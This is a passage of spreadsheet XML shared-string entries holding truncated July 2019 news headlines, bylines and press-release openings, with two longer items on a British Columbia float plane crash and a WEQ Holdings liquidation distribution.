    <t>The "Global Ethernet Storage Fabric (ESF) Market Analysis 2019" report has been added to ResearchAndMarkets.com's offering. The Global...</t>
  </si>
  <si>
    <t>SAN DIEGO, July 22, 2019 /PRNewswire/ -- Seeking to transform the education and well-being of current and future doctors, South Dakota...</t>
  </si>
  <si>
    <t>SOURCE Air Products LEHIGH VALLEY, Pa., July 24, 2019 /PRNewswire/ -- Air Products (NYSE: APD), a world-leading industrial gases company,...</t>
  </si>
  <si>
    <t>Gary Ivenchuck</t>
  </si>
  <si>
    <t>Investing in Ardmore Shipping Corporation? If so, we recommend checking out these offers as well (we believe these to be much more...</t>
  </si>
  <si>
    <t>by Natalie Wolfe</t>
  </si>
  <si>
    <t>CELEBRITY chef George Calombaris has broken down on camera days after his career came to a crashing halt. In a preview for ABC's 7.30, set...</t>
  </si>
  <si>
    <t>Dublin, July 25, 2019 (GLOBE NEWSWIRE) -- The "Australia Data Center Market - Investment Analysis and Growth Opportunities 2019-2024"...</t>
  </si>
  <si>
    <t>TORONTO, July 22, 2019 (GLOBE NEWSWIRE) -- Freshii Inc. (TSX: FRII), the fast-growing health and wellness brand, will host a conference...</t>
  </si>
  <si>
    <t>LISBON, Portugal (AP) — More than 1,000 firefighters are battling a major wildfire in central Portugal for a third day that has already...</t>
  </si>
  <si>
    <t>The city is taking a step toward a more-sustainable future. A City Council committee has approved plans by Entergy New Orleans to build a...</t>
  </si>
  <si>
    <t>By Reuters</t>
  </si>
  <si>
    <t>HOCKENHEIM, Germany, July 28 (Reuters) - Lewis Hamilton endured a German Grand Prix to forget on Sunday as a Mercedes celebration of 200...</t>
  </si>
  <si>
    <t>Michelle Haines Thomas</t>
  </si>
  <si>
    <t>I have a strict policy of never - or at least, hardly ever - paying full price for anything. Of course, that's a total exaggeration,...</t>
  </si>
  <si>
    <t>Shares of Neurocrine Biosciences (NASDAQ: NBIX) were trading almost 10% higher as of 12:20 p.m. EDT Tuesday after the biotech company...</t>
  </si>
  <si>
    <t>ACCESSWIRE</t>
  </si>
  <si>
    <t>NEW YORK, NY / ACCESSWIRE / July 25, 2019 / The Law Offices of Vincent Wong announce that class actions have commenced on behalf of certain...</t>
  </si>
  <si>
    <t>Stephen Sumner &amp; Tom Wright</t>
  </si>
  <si>
    <t>A housing developer says it will consider its options after being refused permission to build 66 homes, and a road through a historic...</t>
  </si>
  <si>
    <t>Share The pressure is on Pierre Gasly to piece together some form for Red Bull, but team motorsport advisor Helmut Marko says the...</t>
  </si>
  <si>
    <t>Reuters</t>
  </si>
  <si>
    <t>By Sofia Menchu GUATEMALA CITY, July 23 (Reuters) - Guatemala's Foreign Minister Sandra Jovel on Tuesday blamed unnamed "national actors"...</t>
  </si>
  <si>
    <t>Majesco (NASDAQ:MJCO), a global leader of cloud insurance software solutions for insurance business transformation, today announced that...</t>
  </si>
  <si>
    <t>International law firm Proskauer announced today the arrival of Ben Orlanski and Matthew O’Loughlin as partners in its Corporate practice...</t>
  </si>
  <si>
    <t>ANCHORAGE, Alaska Wildfires in mostly remote parts of Alaska this summer have burned more than 3,400 square miles under dry and warm...</t>
  </si>
  <si>
    <t>BETH HARRIS</t>
  </si>
  <si>
    <t>GWANGJU, South Korea (AP) — Sun Yang was in the middle of controversy at the world swimming championships again. Only this time, it wasn’t...</t>
  </si>
  <si>
    <t>VICTORIA — Four people have been confirmed dead in a float plane crash on an uninhabited island off the northern tip of Vancouver Island. Lt. Chelsea Dubeau with the Joint Rescue Co-ordination Centre in Victoria said they received word Friday afternoon that a Cessna 208 float plane had crashed on Addenbroke Island, about 100 kilometres off the northern end of Vancouver Island. Dubeau said the BC Ferries vessel Northern Sea Wolf was on scene quickly because it was nearby and a Canadian Coast Guard helicopter, Cormorant helicopter and Buffalo fixed-wing plane were all dispatched to lend assistance. A crew with the Cormorant is on scene, Dubeau said. "Unfortunately we can confirm at this time that there are four individuals that are deceased," Dubeau said. "We can't confirm how many individuals were on the aircraft at this time." A Cessna 208 is capable of carrying 10 to 14 passengers. Dubeau said it's unclear where the plane was heading or if it was a commercial flight. She said no one lives on Addenbroke Island, although there is a lighthouse on the island. The island is on the route the ferry takes from Port Hardy to Prince Rupert. The Canadian Press</t>
  </si>
  <si>
    <t>HOUSTON, July 30, 2019 (GLOBE NEWSWIRE) -- Harvest Oil &amp; Gas Corp. (OTCQX: HRST) (“Harvest” or the “Company”) today announced that it has...</t>
  </si>
  <si>
    <t>NEW YORK, July 24, 2019 (GLOBE NEWSWIRE) -- The global industrial brakes market is projected to reach $1,105.7 million by 2024,...</t>
  </si>
  <si>
    <t>Four valuation models lead to that conclusion, argues Ed Yardeni.</t>
  </si>
  <si>
    <t>The Artists &amp; Athletes Alliance, #Cut50, and UCLA came together Tuesday night at the Four Seasons Hotel Los Angeles at Beverly Hills to...</t>
  </si>
  <si>
    <t>Spanish football star Cesc Fabregas has been banned from driving after he was caught hitting 68mph in a 40mph zone. The former Arsenal and...</t>
  </si>
  <si>
    <t>Dublin, July 29, 2019 (GLOBE NEWSWIRE) -- The "Solvent Borne Adhesives Market - Growth, Trends, and Forecast (2019 - 2024)" report...</t>
  </si>
  <si>
    <t>Marnie Banger, news.com.au</t>
  </si>
  <si>
    <t>Finance Minister Mathias Cormann insists building a “stronger economy” is the best way the Federal Government can help jobseekers...</t>
  </si>
  <si>
    <t>Donovan Klein</t>
  </si>
  <si>
    <t>FORT WAYNE, Ind. (Fort Wayne’s NBC) — Fort Wayne Police tell Fort Wayne’s NBC, two people are hurt following a shooting near the...</t>
  </si>
  <si>
    <t>By Jabeen Waheed For Mailonline</t>
  </si>
  <si>
    <t>Jesy Nelson has revealed that she is finally at peace with herself after years of struggling with her body issues. The singer took to...</t>
  </si>
  <si>
    <t>Ed Jackson</t>
  </si>
  <si>
    <t>The biggest indicator of James O'Connor's transformation from rugby party boy to model professional in Wallabies veteran Will Genia's...</t>
  </si>
  <si>
    <t>NewsOn6.com</t>
  </si>
  <si>
    <t>Tulsa's Promenade Mall may be about to go into foreclosure. Last month, Ready Capital, who holds Promenade's mortgage, filed paperwork...</t>
  </si>
  <si>
    <t>Amanda Bell</t>
  </si>
  <si>
    <t>A good television show can be a uniquely rewarding experience. Whether it's the kind of series that warrants a weekly calendar appointment...</t>
  </si>
  <si>
    <t>Florida Weekly Staff</t>
  </si>
  <si>
    <t>1. Jean Maye and Michelle Martini 2. Seated: Chris McCulloch, Cathy Crumpler, back row: Susie Williams, Brenda Cantrell, Maureen Williams...</t>
  </si>
  <si>
    <t>Top News and Analysis (pro)</t>
  </si>
  <si>
    <t>China is forging ahead with efforts to create a national social credit system. Some analysts doubt authorities can reach their goal.</t>
  </si>
  <si>
    <t>Associated Press; Nick Viviani</t>
  </si>
  <si>
    <t>WICHITA, Kan. (AP) — An attorney argues that a boy who was 14 when he shot and killed his drunken mom at a mansion near Wichita was legally...</t>
  </si>
  <si>
    <t>Thomas Moralez</t>
  </si>
  <si>
    <t>The stock of BeiGene, Ltd. (BGNE) formed a down wedge with $117.85 target or 9.00 % below today’s $129.51 share price. The 6 months wedge...</t>
  </si>
  <si>
    <t>CLEVELAND, July 26, 2019 /PRNewswire/ -- The ongoing tech trade war between China and the US has another major dimension to it: The global...</t>
  </si>
  <si>
    <t>SEATTLE, WA / ACCESSWIRE / July 27, 2019 / Who doesn’t want to be perfectly fit and in shape these days? Fitness goals have become a noble...</t>
  </si>
  <si>
    <t>Over the years, range of touch based interactive information have come forth to comply with the needs of users. The significance of kiosk...</t>
  </si>
  <si>
    <t>ATLANTA (AP) — The Latest on a hearing over Georgia's election systems: (all times local): 10:35 p.m. A federal judge says Georgia...</t>
  </si>
  <si>
    <t>With a left knee injury, Marco Ascencio was forced to leave Real Madrid's second preseason game against Arsenal, and Madrid's medical staff...</t>
  </si>
  <si>
    <t>Arsenal are closing in on the club-record signing of winger Nicolas Pepe from Lille, PA understands. The 24-year-old scored 22 goals in...</t>
  </si>
  <si>
    <t>Inside City Hall</t>
  </si>
  <si>
    <t>City Comptroller Scott Stringer sat down with Errol Louis to discuss his audit that says NYCHA mishandled roof repairs that could waste...</t>
  </si>
  <si>
    <t>According to Mart Research new published report, the "Global Facility Management (FM) Market is expected to reach US$ 71.5 Bn by 2024 from...</t>
  </si>
  <si>
    <t>DUBLIN --(BUSINESS WIRE) The "Manufacture and Wholesale of Basic Iron and Steel in South Africa 2019" report has been added to...</t>
  </si>
  <si>
    <t>By DIANE JEANTET Associated Press</t>
  </si>
  <si>
    <t>RIO DE JANEIRO (AP) — Four inmates allegedly involved in deadly clash between prison gangs have died of asphyxiation while being...</t>
  </si>
  <si>
    <t>Below are the three companies in the Oil &amp; Gas Refining &amp; Marketing industry with the highest earnings yields. Earnings yield is useful to...</t>
  </si>
  <si>
    <t>By Lisa Rapaport (Reuters Health) - Pregnant women who continue to carry their babies after they reach full term have a higher risk of...</t>
  </si>
  <si>
    <t>Millstone, NJ -- (ReleaseWire) -- 07/24/2019 -- RxBioLabs has started production of CimexiShield the only topical Bed Bug repellent for...</t>
  </si>
  <si>
    <t>Joseph Goedert</t>
  </si>
  <si>
    <t>The National Institute on Aging within the National Institutes of Health (NIH) has awarded the University of California at Berkeley $47...</t>
  </si>
  <si>
    <t>0 comment Britain could bake under record-breaking heat as temperatures could potentially climb to 39C on Thursday. The scorching...</t>
  </si>
  <si>
    <t>Report Name:“2018-2023 Global Pressure Vessels Consumption Market Report”.</t>
  </si>
  <si>
    <t>TIGNES, France (AP) — French rider Thibaut Pinot has withdrawn from the Tour de France with an apparent left leg injury. Two days before...</t>
  </si>
  <si>
    <t>blica</t>
  </si>
  <si>
    <t>Full Title : Fat Witch Brownies: Brownies, Blondies, and Bars from New York’s Legendary Fat Witch Bakery (Fat Witch Baking Cookbooks)...</t>
  </si>
  <si>
    <t>SAN FRANCISCO, July 31, 2019 (GLOBE NEWSWIRE) -- Texada Software, a wholly owned subsidiary of Noble Iron Inc. (TSX Venture: NIR),...</t>
  </si>
  <si>
    <t>HARWICH – Richard Houston, a history teacher at Monomoy Regional High School in Harwich has been awarded the American Battlefield Trust’s...</t>
  </si>
  <si>
    <t>Julie Day</t>
  </si>
  <si>
    <t>Want to fill a blank backyard with something green? First, read our guide on the types of trees often used in home landscapes!</t>
  </si>
  <si>
    <t>Kim Kardashian West has burnt her boobs after spending all day out in the sunshine.</t>
  </si>
  <si>
    <t>By MARTIN CRUTSINGER</t>
  </si>
  <si>
    <t>A towering column of ash exploded from a volcano on Indonesia's most populous island, Java, forcing tourists and residents to flee.</t>
  </si>
  <si>
    <t>RNS Number : 8498G PSI Software AG 26 July 2019 PSI Software AG / Key word(s): Half Year Results/Quarter Results PSI grows by 13 percent...</t>
  </si>
  <si>
    <t>By Tom Sparks Correspondent</t>
  </si>
  <si>
    <t>WHEATFIELD — The Kankakee Valley High School will hold a mandatory meeting for all fall sports athletes and their parents on Thursday, Aug....</t>
  </si>
  <si>
    <t>SOURCE MASH Gallery One-year-anniversary art exhibition celebrating light. Curated by Haleh Mashian. August 17 thru September 21. Reception...</t>
  </si>
  <si>
    <t>Los Angeles Angels (52-49, third in the AL West) vs. Los Angeles Dodgers (67-35, first in the AL West) Los Angeles; Tuesday, 10 p.m. EDT...</t>
  </si>
  <si>
    <t>Robyn Wuth</t>
  </si>
  <si>
    <t>A Chinese university student who hurled an echidna from a Brisbane bridge to test its survival has been barred from owning animals and...</t>
  </si>
  <si>
    <t>Liz Weston .</t>
  </si>
  <si>
    <t>As a spokesperson for the insurance industry, Loretta Worters often gives tips to homeowners on preventing water damage. Some of her...</t>
  </si>
  <si>
    <t>FILE - This Jan. 14, 2019, file photo shows the logo for Pacific Gas &amp; Electric Co. above a trading post on the floor of the New York Stock...</t>
  </si>
  <si>
    <t>Shane Hupp</t>
  </si>
  <si>
    <t>Colgate-Palmolive (NYSE:CL) announced its earnings results on Friday. The company reported $0.72 earnings per share (EPS) for the quarter,...</t>
  </si>
  <si>
    <t>Ban imposed on camps near Chandertal Lake</t>
  </si>
  <si>
    <t>Four-laning of the Parwanoo-Solan National Highway has become a bane of the commuter with neither the NHAI, nor the district administration...</t>
  </si>
  <si>
    <t>SG Blocks, Inc. (NASDAQ: SGBX), a leading designer, fabricator and innovator of container-based structures, today announced that it is...</t>
  </si>
  <si>
    <t>The process for people trying to leave the cashless welfare card program will become more streamlined under a federal government proposal....</t>
  </si>
  <si>
    <t>Coach Rassie Erasmus is curious to see how his Springboks react now that they're actually given a decent chance of beating the All Blacks...</t>
  </si>
  <si>
    <t>HONG KONG — Protesters in Hong Kong have disrupted subway service during the morning commute by blocking the...</t>
  </si>
  <si>
    <t>NEW YORK, July 31, 2019 /PRNewswire/ -- Pareteum Corporation (Nasdaq: TEUM), the rapidly growing cloud communications platform company,...</t>
  </si>
  <si>
    <t>LOS ANGELES, July 30, 2019 /PRNewswire/ -- Ignite International, Ltd. ("Ignite" or the "Company") today announced the appointment of Oliver...</t>
  </si>
  <si>
    <t>Aaron Kasinitz</t>
  </si>
  <si>
    <t>The Baltimore Ravens plan to sign quarterback Joe Callahan in the wake of an injury to their backup, Robert Griffin III, according to a...</t>
  </si>
  <si>
    <t>Roxana Kopetman</t>
  </si>
  <si>
    <t>Southern California immigrant with DACA status travels to Mexico so he can become a legal permanent resident. But instead of getting the OK...</t>
  </si>
  <si>
    <t>Accelerating a rapid ascent to the forefront of the industry, Sweet Flower—a cannabis lifestyle brand committed to modernizing the cannabis...</t>
  </si>
  <si>
    <t>Cleveland Indians starting pitcher Shane Bieber (57) throws against the Toronto Blue Jays during the first inning of a baseball game,...</t>
  </si>
  <si>
    <t>Welsh patients are taking part in a drugs trial aimed at slowing late-stage multiple sclerosis progression. Experts are looking at how...</t>
  </si>
  <si>
    <t>Global “Industrial Wireless in Discrete Industries Market” 2019 Industry Research Report is a professional and in-depth study on the...</t>
  </si>
  <si>
    <t>UNITED STATES, WASHINGTON (VOP TODAY NEWS) — The campaign for the presidential election on September 28 will begin in Afghanistan, where...</t>
  </si>
  <si>
    <t>Asia's top selling Online Digital Marketing Course is now available for students in a classroom instruction mode in India's National...</t>
  </si>
  <si>
    <t>Canadian Press</t>
  </si>
  <si>
    <t>TORONTO — Torstar Corp. says it had a $17.4 million loss attributable to equity shareholders in the second quarter, as revenue dropped 11...</t>
  </si>
  <si>
    <t>Celtic boss Neil Lennon will hand new signing Christopher Jullien his eagerly-awaited debut against Nomme Kalju on Tuesday night. The...</t>
  </si>
  <si>
    <t>Nigerian police and Shi'ite Muslim protesters clashed in the capital Abuja on Monday, with at least one demonstrator, one journalist and a...</t>
  </si>
  <si>
    <t>Today, PerkinElmer, Inc. and EverlyWell, Inc. announced a new collaboration designed to accelerate innovation in and accessibility of...</t>
  </si>
  <si>
    <t>Quad/Graphics, Inc. (NYSE: QUAD) (“Quad” or the “Company”) today reported results for its second quarter ending June 30, 2019. Recent...</t>
  </si>
  <si>
    <t>by means of: BRIAN HALL, Associated Press Posted: / Updated: MINNEAPOLIS (AP) - Aaron Hicks made a game-saving trap in center field for...</t>
  </si>
  <si>
    <t>Laurent Koscielny is still determined to leave Arsenal this summer despite ongoing talks between club and player, PA understands. The...</t>
  </si>
  <si>
    <t>VANCOUVER, July 23, 2019 /CNW/ - WEQ Holdings Inc. (formerly WesternOne Inc.) ("WEQ" or the "Corporation") by The Bowra Group Inc. in its capacity as the Court-appointed liquidator of WEQ (the "Liquidator"), today announced that shareholders as of the close of business on July 23, 2019 (the "Record Date") will be entitled to receive an interim distribution (the "Interim Distribution") made pursuant to a Liquidation Plan dated December 17, 2018 (the "Plan") of Cdn$2.00 per share. The Plan was approved by the Supreme Court of British Columbia (the "Court") pursuant to an Order dated December 17, 2018 (the "Liquidation Order"). The Interim Distribution will be characterized as a reduction of stated capital. Shareholders are advised to consult their own tax and financial advisors in respect of the Interim Distribution. By July 25, 2019, the Liquidator will transfer the aggregate value of the Interim Distribution, on behalf and for the account of the Corporation, to the Corporation's transfer agent. The Liquidator anticipates that the Interim Distribution will be made by the transfer agent to WEQ shareholders on or about July 26, 2019. WEQ currently has 16,402,044 common shares issued and outstanding. The Plan, Liquidation Order and other materials filed in the Corporation's liquidation proceedings can be found on the Liquidator's website at: www.bowragroup.com.The Liquidator will continue to make available on its website additional information and updates on the status of WEQ's liquidation proceedings. It also intends to disseminate a further news release in September 2019 to provide an update generally including with respect to the timing of any additional distribution. Forward-Looking Information Certain statements in this news release may constitute "forward-looking information" within the meaning of applicable Canadian securities laws, which information involves known and unknown risks, uncertainties and other factors that may cause actual results, performance or achievements or industry results, to be materially different from any future results, performance or achievements or industry results expressed or implied by such forward-looking information. Forward-looking information is identified by the use of terms and phrases such as "anticipate", "believe", "could", "estimate", "expect", "intend", "may", "plan", "predict", "project", "will", "would", and similar terms and phrases, including references to assumptions. Such information includes, without limitation, statements with respect to: the anticipated liquidation of the Corporation and distributions to shareholders, including the Interim Distribution, timing of the Interim Distribution, the amount of the Interim Distribution, the Liquidator continuing to make available on its website additional information and updates on the status of WEQ's liquidation proceedings, and the Liquidator's intention to disseminate a further news release in September 2019 to provide a general update, including with respect to the timing of any additional distribution. Although the forward-looking information contained in this news release is based upon what WEQ and the Liquidator believe to be reasonable assumptions, it cannot assure investors that actual results will be consistent with such information. Certain key expectations and assumptions made by the Corporation and the Liquidator and reflected in the forward-looking information in this news release include without limitation: there will be no intervening events that will materially reduce the amount funds available for the Interim Distribution or an additional distribution or that delay the Interim Distribution or any additional distributions. Forward-looking information reflects current expectations of WEQ regarding future events and operating performance as of the date of this news release. Such information involves significant risks and uncertainties, should not be read as guarantees of future performance or results, and will not necessarily be accurate indications of whether or not such results will be achieved. A number of factors could cause actual results to differ materially from the results discussed in the forward-looking information, including, without limitation: the risk that the Interim Distribution or any additional distribution will be less than anticipated; and the risk that the timing of the Interim Distribution or any additional distribution will be delayed. Should any of the foregoing risks materialize, or should assumptions underlying the forward-looking information prove incorrect, actual results, performance, activities or achievements could vary materially from those expressed or implied by any forward-looking information contained in this news release. Readers are cautioned that the foregoing list of risks is not exhaustive. Additional information on these and other risk factors that could affect WEQ can be found under "Risk Factors" in its Annual Information Form dated March 27, 2018, its Information Circular dated October 26, 2018 and its Management's Discussion &amp; Analysis dated November 6, 2018, all of which are available on SEDAR at www.sedar.com. The forward-looking information contained herein is expressly qualified in its entirety by this cautionary statement. Forward-looking information reflects WEQ's current beliefs and is based on information currently available to it. The forward-looking information is made as of the date of this news release and WEQ assumes no obligation to update or revise such information to reflect new events or circumstances, except as may be required by applicable law. Additional Information Additional information relating to WEQ and other public filings, is available on SEDAR at www.sedar.com or on WEQ's website at www.weq.ca or on The Bowra Group Inc.'s website at www.bowragroup.com. SOURCE WEQ Holdings Inc. View original content: http://www.newswire.ca/en/releases/archive/July2019/23/c1828.html Copyright CNW Group 2019 Comment On! Comment Image Social Media Twitter StockTwits LinkedIn 140 Add LinkedIn Connection x To post messages to your LinkedIn account, you must first give authorization from LinkedIn.com Add Connection Add StockTwits Connection x To post messages to your StockTwits account, you must first give authorization from StockTwits.com Add Connection Add Twitter Connection x To post messages to your Twitter account, you must first give authorization from Twitter.com Add Connection Upload limit is up to 1mb only To post a message to social media, first log in or sign up for free CanadianInsider.com account. To post messages to your Socail Media account, you must first give authorization from the websites. Select the platform you wish to connect your account to CanadianInsider.com (via Easy Blurb). LinkedIn StockTwits Twitter</t>
  </si>
  <si>
    <t>Ewan Murray</t>
  </si>
  <si>
    <t>The Open winner, Shane Lowry, says his Royal Portrush victory has given him new confidence and puts 2020 Tokyo Olympics medal on his wish...</t>
  </si>
  <si>
    <t>Patricio G. Balona</t>
  </si>
  <si>
    <t>The two DeLand officers gave accounts of bad behavior by a Sanford man that weren't backed up in review of video from body worn cameras....</t>
  </si>
  <si>
    <t>FAIRFAX, Va., July 22, 2019 (GLOBE NEWSWIRE) -- Playa Hotels &amp; Resorts N.V. (NASDAQ: PLYA, the “Company”) today announced that, due to...</t>
  </si>
  <si>
    <t>LEGEND</t>
  </si>
  <si>
    <t>July 31, 2019 It’s just a freestyle, but Don Q is coming hard with this “Crazy Story” track. With no hook, the High Bridge rapper gets...</t>
  </si>
  <si>
    <t>News - Crain's New York Business News Feed</t>
  </si>
  <si>
    <t>To view the full story, click the title link.</t>
  </si>
  <si>
    <t>the Daily Sports Staff</t>
  </si>
  <si>
    <t>Before the Washington football team starts fall camp on Aug. 2, read our writers' best takes on the upcoming football season. Today, Alec...</t>
  </si>
  <si>
    <t>Microsoft has announced this week's Deals With Gold for Xbox Live Gold members. These deals run through July 30 at 6am ET / 3am PT....</t>
  </si>
  <si>
    <t>PHOENIX, July 23, 2019 /PRNewswire/ -- National Parent's Day is July 28th, a time to celebrate your mother and father and let them know how...</t>
  </si>
  <si>
    <t>KINSTON, N.C. (AP) -- Sal Mendez allowed just two hits over five innings, leading the Down East Wood Ducks over the Carolina Mudcats in a...</t>
  </si>
  <si>
    <t>CHICAGO (AP) — Adult literacy programs across Illinois will split $5.6 million in state grants to help people improve their...</t>
  </si>
  <si>
    <t>SUNNYVALE, Calif., July 30, 2019 (GLOBE NEWSWIRE) -- The CBRS Alliance, an industry organization focused on driving the development,...</t>
  </si>
  <si>
    <t>TAIPEI, Taiwan, July 30, 2019 /PRNewswire/ -- The 2nd Presidential Hackathon Final Awards Ceremony was held at the Office of the President...</t>
  </si>
  <si>
    <t>TEL AVIV, Israel and NEW YORK, July 30, 2019 /PRNewswire/ -- Today, monday.com, the work management platform that empowers teams to manage...</t>
  </si>
  <si>
    <t>Nearly four years after the automaker admitted cheating on diesel emissions tests, and after Volkswagen has now spent more than 30 billion...</t>
  </si>
  <si>
    <t>ADAMS NEWS</t>
  </si>
  <si>
    <t>Parents of teens have a lot to worry about, but sexting should apparently not be high on the list. Florida Atlantic University...</t>
  </si>
  <si>
    <t>JON VIKTOR D. CABUENAS, GMA News</t>
  </si>
  <si>
    <t>The Philippine peso closed slightly weaker against the dollar on Monday, on dimmed hopes of an aggressive rate cut in the United States....</t>
  </si>
  <si>
    <t>The law firm of Kirby McInerney LLP announces that a class action lawsuit has been filed in the U.S. District Court for the Southern...</t>
  </si>
  <si>
    <t>Artist, Diego Ramirez joins Sunday arts mag to discuss his works and the show Signs of the Undead. Showing at Mars Gallery, Windsor until...</t>
  </si>
  <si>
    <t>Leila Fadel</t>
  </si>
  <si>
    <t>Muslims make up about 9% of state prisoners, though they are only about 1% of the U.S. population, a new report from the civil rights...</t>
  </si>
  <si>
    <t>DUBLIN, July 23, 2019 /PRNewswire/ -- The "Industrial Wax - Global Market Outlook (2017-2026)" report has been added to...</t>
  </si>
  <si>
    <t>UK Leader</t>
  </si>
  <si>
    <t>Britain's next prime minister will be Boris Johnson after the hard-Brexit advocate won a ballot of around 160,000 Conservative Party...</t>
  </si>
  <si>
    <t>Michael Bloch</t>
  </si>
  <si>
    <t>Solar panel manufacturer Suntech has announced its participation in the Clean Energy Regulator’s Solar Panel Validation (SPV) program. In...</t>
  </si>
  <si>
    <t>The Board of Directors of Turning Point Brands, Inc. (NYSE: TPB) declared a regular quarterly dividend of $0.045 per common share. The...</t>
  </si>
  <si>
    <t>PLANO, Texas, July 25, 2019 (GLOBE NEWSWIRE) -- Denbury Resources Inc. (NYSE: DNR) (“Denbury” or the “Company”) will host a conference...</t>
  </si>
  <si>
    <t>Wayne Landers</t>
  </si>
  <si>
    <t>Gradient Capital Advisors LLC reduced its position in shares of Schwab US Dividend Equity ETF (NYSEARCA:SCHD) by 13.0% in the 2nd quarter,...</t>
  </si>
  <si>
    <t>With Britain closing in, Nathan Adrian sprinted furiously to the wall</t>
  </si>
  <si>
    <t>Steven Loung</t>
  </si>
  <si>
    <t>The MLB’s July 31 trade deadline is less than a week away and with so many teams who could still potentially be buyers the hot stove is...</t>
  </si>
  <si>
    <t>Pete Hayes, phayes@thetelegraph.com</t>
  </si>
  <si>
    <t>Bowling, making friends, gohand in hand for Westbrook</t>
  </si>
  <si>
    <t>Harvey Truce</t>
  </si>
  <si>
    <t>Camden Property Trust (NYSE:CPT) issued an update on its third quarter 2019 earnings guidance on Thursday morning. The company provided EPS...</t>
  </si>
  <si>
    <t>MASON, Ohio, July 24, 2019 /PRNewswire/ -- Supplier Relationship Management (SRM) innovator ConnXus is aiming to accelerate supplier growth...</t>
  </si>
  <si>
    <t>Global “Soft Touch Laminating Films Market” 2019 Research report provides information regarding market size, share, trends, growth, cost...</t>
  </si>
  <si>
    <t>Coherus BioSciences, Inc. ("Coherus" or "the Company", Nasdaq: CHRS), today announced that the United States Court of Appeals for the...</t>
  </si>
  <si>
    <t>LOS ANGELES, CA / ACCESSWIRE / July 23, 2019 / Carinsuranceshoppingsource.com has released a new blog post that explains how much car...</t>
  </si>
  <si>
    <t>David Holmes</t>
  </si>
  <si>
    <t>On Tuesday the shares-rate of the Company Wabtec Corp, WAB Stock exchange NYSE, is an exciting player in the Transportation. Analyst...</t>
  </si>
  <si>
    <t>CAIRO Sudan's pro-democracy movement is calling for marches in the capital, Khartoum, and in other locations across the country. The...</t>
  </si>
  <si>
    <t>NEWARK, Del., July 30, 2019 (GLOBE NEWSWIRE) -- The Board of Directors of Artesian Resources Corporation (Nasdaq: ARTNA), which includes...</t>
  </si>
  <si>
    <t>Ironwood Pharmaceuticals, Inc. (Nasdaq: IRWD), a GI-focused healthcare company, today provided an update on its second quarter 2019 results...</t>
  </si>
  <si>
    <t>The Honor 20 Professional has in any case won an August unlock date and value within the U.Okay., weeks after the telephone was once...</t>
  </si>
  <si>
    <t>Jim Carter</t>
  </si>
  <si>
    <t>Separating the winners from the losers is a constant challenge for investors. Many focused investors may look to track stock momentum based...</t>
  </si>
  <si>
    <t>The "Global Deepwater and Ultra-Deepwater Drilling Market 2019-2023." report has been added to ResearchAndMarkets.com's offering. Rise in...</t>
  </si>
  <si>
    <t>SALTILLO, Mexico (AP) -- Ricardo Serrano hit a two-run single in the sixth inning, leading the Saraperos de Saltillo to a 10-3 win over the...</t>
  </si>
  <si>
    <t>Boris Johnson and Jeremy Hunt are waiting to find out who has won the race to become the next Tory leader – and is set to become Britain’s...</t>
  </si>
  <si>
    <t>Associated Press</t>
  </si>
  <si>
    <t>The $26.5 billion buyout will put the new, combined company similar in size to Verizon and AT&amp;T, but comes with fears of price hikes and...</t>
  </si>
  <si>
    <t>NEW YORK, July 31, 2019 (GLOBE NEWSWIRE) -- Feedvisor, the “AI-first” optimization and intelligence platform for large sellers and brands...</t>
  </si>
  <si>
    <t>Jim Pickard in London</t>
  </si>
  <si>
    <t>The Labour leadership will be pushed to adopt a more hardline position on dealing with climate change during its autumn conference, after a...</t>
  </si>
  <si>
    <t>NEW YORK, NY / ACCESSWIRE / July 31, 2019 / Zynex, Inc. (NASDAQ: ZYXI) will be discussing their earnings results in their 2019 Second...</t>
  </si>
  <si>
    <t>Ombudsman Judi Jones says a small group of NBN providers used high-pressure phone sales tactics. Australia's telecommunications watchdog...</t>
  </si>
  <si>
    <t>Jerold Chinn</t>
  </si>
  <si>
    <t>A preliminary investigation into Sunday’s deadly crash in San Francisco indicates the Tesla’s auto pilot feature was not active when it...</t>
  </si>
  <si>
    <t>PHILADELPHIA, July 29, 2019 /PRNewswire/ -- Honey Stinger, the award-winning maker of sports nutrition products featuring honey, has joined...</t>
  </si>
  <si>
    <t>Rosen Law Firm, a global investor rights law firm, announces it has filed a class action lawsuit on behalf of purchasers of the securities...</t>
  </si>
  <si>
    <t>National news from the Associated Press</t>
  </si>
  <si>
    <t>Meredith Bruckner</t>
  </si>
  <si>
    <t>Happy Friday! Mother Nature came out in full force during the Ann Arbor Art Fair last week. Sweltering heat and humidity paired with severe...</t>
  </si>
  <si>
    <t>Tualatin, Oregon - Primary healthcare is the backbone of modern health services in communities and society at large. However, because of...</t>
  </si>
  <si>
    <t>PRESS RELEASE GlobeNewswire</t>
  </si>
  <si>
    <t>Northvale, NJ, July 29, 2019 (GLOBE NEWSWIRE) -- via NEWMEDIAWIRE -- ADM Tronics Unlimited, Inc. (OTCQB: ADMT) is expanding research and...</t>
  </si>
  <si>
    <t>By: Christia Marie Ramos - Reporter / @CMRamosINQ</t>
  </si>
  <si>
    <t>Philippine President Rodrigo Duterte, second right, and Chinese President Xi Jinping, second left, attend the meeting at the Great Hall of...</t>
  </si>
  <si>
    <t>WHEELING, W.Va., July 23, 2019 /PRNewswire/ -- WesBanco, Inc. ("WesBanco") (Nasdaq:WSBC) and Old Line Bancshares, Inc. ("Old Line")...</t>
  </si>
  <si>
    <t>SAN FRANCISCO (AP)  Tesla suffered a loss of $408 million during its latest quarter as the company continues to struggle to prove it can...</t>
  </si>
  <si>
    <t>VAN NUYS, CA / ACCESSWIRE / July 30, 2019 / Capstone Turbine Corporation (www.capstoneturbine.com) (NASDAQ:CPST), the world’s leading clean...</t>
  </si>
  <si>
    <t>Teenagers gather on a hill near Lake Cargelligo airstrip. They hear it coming, look to the sky and let the Hercules C-130 aircraft rumble...</t>
  </si>
  <si>
    <t>July 22-- ST. PETERSBURG, Fla. -The Red Sox are off to a winning start in their most critical two-week stretch of the season to date....</t>
  </si>
  <si>
    <t>Sinn Fein’s vice president said her party won’t agree to a deal to restore the powersharing government unless it includes the extension of...</t>
  </si>
  <si>
    <t>By DOUG FEINBERG AP Basketball Writer</t>
  </si>
  <si>
    <t>NEW YORK (AP) — Alexis Peterson and her Force 10 teammates see themselves as the "Founding Mothers." They are the first group of women to...</t>
  </si>
  <si>
    <t>Two young men thought missing are now suspects in the murders of an American woman and her Australian boyfriend as well as the death of...</t>
  </si>
  <si>
    <t>Global anti-knock preparation market is anticipated to witness an exponential growth in the forecast period. The factors that propel the...</t>
  </si>
  <si>
    <t>Rob Forsaith</t>
  </si>
  <si>
